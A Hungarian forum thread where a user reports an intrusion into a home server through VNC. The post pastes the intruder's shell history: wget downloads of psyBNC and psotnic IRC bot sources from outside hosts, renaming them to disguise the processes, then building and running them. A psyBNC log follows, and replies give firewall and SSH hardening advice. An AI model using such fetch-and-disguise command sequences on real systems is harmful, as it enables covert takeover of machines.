Beslattyantak

Fórumok

Úgy tűnik valaki besétált az otthoni mindenes gépemre a VNC szerveren keresztül. Szerencsére csak felhasználói jogokat szerzett, nem úgy néz ki ezekből, hogy nagyon rombolni akart. Ezt tette shell-ben:


wget lalal
ls
cd video
cd /video
cd Video
ls
cd
cd Zone
cd /Zone
cd Zone
cd download
cd Download
ls
cd
ls
cd tmp
ls
cd kde tupa
cd kde-tupa
ls
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar -xzvf psyBNC-2.3.2-7.tar.gz 
ls
rm -fr  psyBNC-2.3.2-7.tar.gz
ls
mv psybnc ksycocakrn
ls
cd ksycocakrn/
make
pico psybnc.conf
ls
pico psybnc.conf
jed psybnc.conf
jove psybnc.conf
epoch psybnc.conf
vim psybnc.conf
ls
cd tmp
ls
cd kde-tupa/
ls
cd ksycocakrn/
ls
pico psybnc.conf
psybnc
./psybnc
cd
cd kde-tupa/
cd tmp
cd kde-tupa/
ls
kill -9 29678
ls
rm -fr ksycocakrn/
ls
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
rm -fr  psyBNC-2.3.2-7.tar.gz
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar -xzvf psyBNC-2.3.2-7.tar.gz 
rm -fr  psyBNC-2.3.2-7.tar.gz
mv psybnc ksycocakrn
ls
cd ksycocakrn/
make
nano psybnc.conf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
pico psybnc.conf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
ls
pico psybnc.conf
vi psybnc.conf
kill -9 29870
cd tmp
cd kde-tupa/
cd ksycocakrn/
make
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
rm -fr psybnc.conf.swp
ls
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi -r psybnc.conf
vi psybnc.conf
cd tmp
vi -r psybnc.conf
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
ls
vin psybnc.conf
ls
vi psybnc.conf
./psybnc
kill -9 30596
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
make menuconfig
cd tmp
cd kde-tupa/
make menuconfig
cd ksycocakrn/
make menuconfig
menucodsaflkj
cd tmp
cd kde-tupa/
cd ksycocakrn/
menuconf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
vi psybnc.conf
cd ksycocakrn/
vi psybnc.conf

./psybnc
vi psybnc.conf
./psybnc
cd
cd kde-tupa/
cd tmp
cd kde-tupa/
wget http://friends.polibuda.info/~grusin/src/psotnic-current.tar.gz
tar -xzvf psotnic-current.tar.gz 
mv psotnic-current kdemard
ls
rm -fr psotnic-current.tar.gz
cd kdemard/
ls
./configure
make static
cd bin
vi sl
./psotnic -c sl
ls
./psotnic -c sl
mv sl sl.slave
./psotnic -c sl.slave
psotnic -c sl.slave
cd
ls
cd tmp
cd kde-tupa
ls
cd kdemard/
cd bin
ls
cd
cd tmp
cd kde-tupa
cd kdemard/
make static
cd bin
./psotnic -c sl.slave
vi sl.slave
./psotnic -c sl.slave
cd
cd kde-tupa
cd tmp
cd kde-tupa
cd kdemard/
./configure
make static
cd bin
./psotnic -c sl.slave
uptime
who
ls
cd tmp
l
cd kde-tupa/
ls
cd kdemard/
ls
cd bin
ls
psotnic -c sl.slave
cd
cd tmp
cd kde-tupa/
ls
rm -fr kdemard/
ls
wget http://friends.polibuda.info/~grusin/src/psotnic-current.tar.gz
ls
tar -xzvf psotnic-current.tar.gz 
cd psotnic-current
./configure
make
make static
cd bin
ls
make
cd
cd tmp
cd kde-tupa/
ls
rm -fr psotnic-current
rm -fr psotnic-current.tar.gz 
uptime

Ez pedig a telepített mórickaprogramjának a logja:


Tue Sep 12 13:48:56 :Listener created :0.0.0.0 port 4441
Tue Sep 12 13:48:56 :Can't create listening sock on host * port 4441 (bind)
Tue Sep 12 13:48:56 :SSL initialized
Tue Sep 12 13:48:56 :Loading all Users..
Tue Sep 12 13:48:56 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :31177)
Tue Sep 12 13:49:01 :User andrej () trying atw.irc.hu port 6668 ().
Tue Sep 12 13:49:01 :User andrej () connected to atw.irc.hu:6668 ()
Tue Sep 12 13:49:27 :connect from adshells.net
Tue Sep 12 13:49:35 :User andrej logged in.
Tue Sep 12 14:05:09 :User andrej quitted (from 193.77.238.37)
Tue Sep 12 14:25:11 :User andrej (_andrej) disconnecting from stoned server.
Tue Sep 12 14:25:11 :User andrej got disconnected from server.
Tue Sep 12 14:25:17 :User andrej () trying atw.irc.hu port 6668 ().
Tue Sep 12 14:25:17 :User andrej () connected to atw.irc.hu:6668 ()
Tue Sep 12 20:46:16 :connect from adshells.net
Tue Sep 12 20:46:19 :User andrej logged in.
Tue Sep 12 20:47:42 :User andrej quitted (from 193.77.238.37)

Nekem erről csak az jutott eszembe, hogy a francba. Valakinek eszébe jut valami más?

Hozzászólások

Mé' kell vnc szerver internetre rakott gépre...? Egy el...ett portra rakott ssh, csak kulcsos authentikációval tökéletesen elég az esetek 99.99 százalékában...
A mórickaprogramja meg szépen zombit csinált a gépedből -- célszerű lenne a tűzfaladat normálisan felkonfigurálni (befelé gyakorlatilag semmit ne engedj, kifelé si csak azokra a portokra, amire szükséged van, tehát ha nem irc-elsz, akkor az irc-es portokra nem...)

És ha már kell VNC, akkor azt ssh-n előtte el lehet indítani, amikor kell. Aztán meg lelőni. Ha pedig tudod, honnan fogsz VNC-zni, akkor csak arról az egy IP-ről engedd be a kérést.
Mostanában egyébként nálam is megszaporodtak a próbálkozások, látszik a tűzfal logjában. Biztos valami közkézen forgó szkriptbe belehegesztették, hogy próbálgassa a VNC-t is.

Én azt nem értem egyáltalán minek VNC egy bármilyen, UNIX alapú oprendszerre? Mire jó? gnome-panel-re applettet rakni? Vagy minek?

uhh, ez súlyos volt. Van icewm is, meg fluxbox is, stb., nem csak gnome létezik a világon.

Pl. leülsz egy grafikus felülettel rendelkező géphez (m$, linux, stb.), majd bejelentkezel vnc-n egy szerverre. Azon lehet pl. levelet olvasni, küldeni; openoffice-t, amsn-t futtatni, stb. A környezet fix... Nekem jól jön az ilyen.

Én csak példának hoztam a gnome-ot. Sose nem is használtam. Fluxbox rulez. Asszonykának meg a KDE jött be, de én attól is vakaródzom.
De a kérdésem még mindíg áll. Openoffice-t szerintem lokálban célszerű használni. Inkább az állományt vinném át a másik gépre. amsn helyett centericq, ha már mindenképpen egy másik gépről akarok ilyet csinálni (bár ha mondjuk vnc-n érem el a másik gépet, akkor valószínűleg van hálózat az én gépemben is). Ha meg már mindenképpen grafikusan akarom használni a gépet, akkor win-en xming, linuxon X11-en keresztül.
De mindegy is. Csak nem értem a vnc mániát.
Az én bajom.

tessék ssh port forvardot csinálni

ha :1 van fent akkor

ssh -C -l 5901:localhost:5901 othoni-gép.hu amin megy a vnc

igy csak az ssh portnak kell nyitva lenni.

esetleg egy udp-nak ha openvpn-t is akarsz.

Hi!

MPathy: a screent pont erre talaltak ki: be ssh-zol, elinditasz valamit 1 screen sessionben, detach, logout.
Be ssh, attach, kukk, detach, logout.

Csak ugye ez konzolos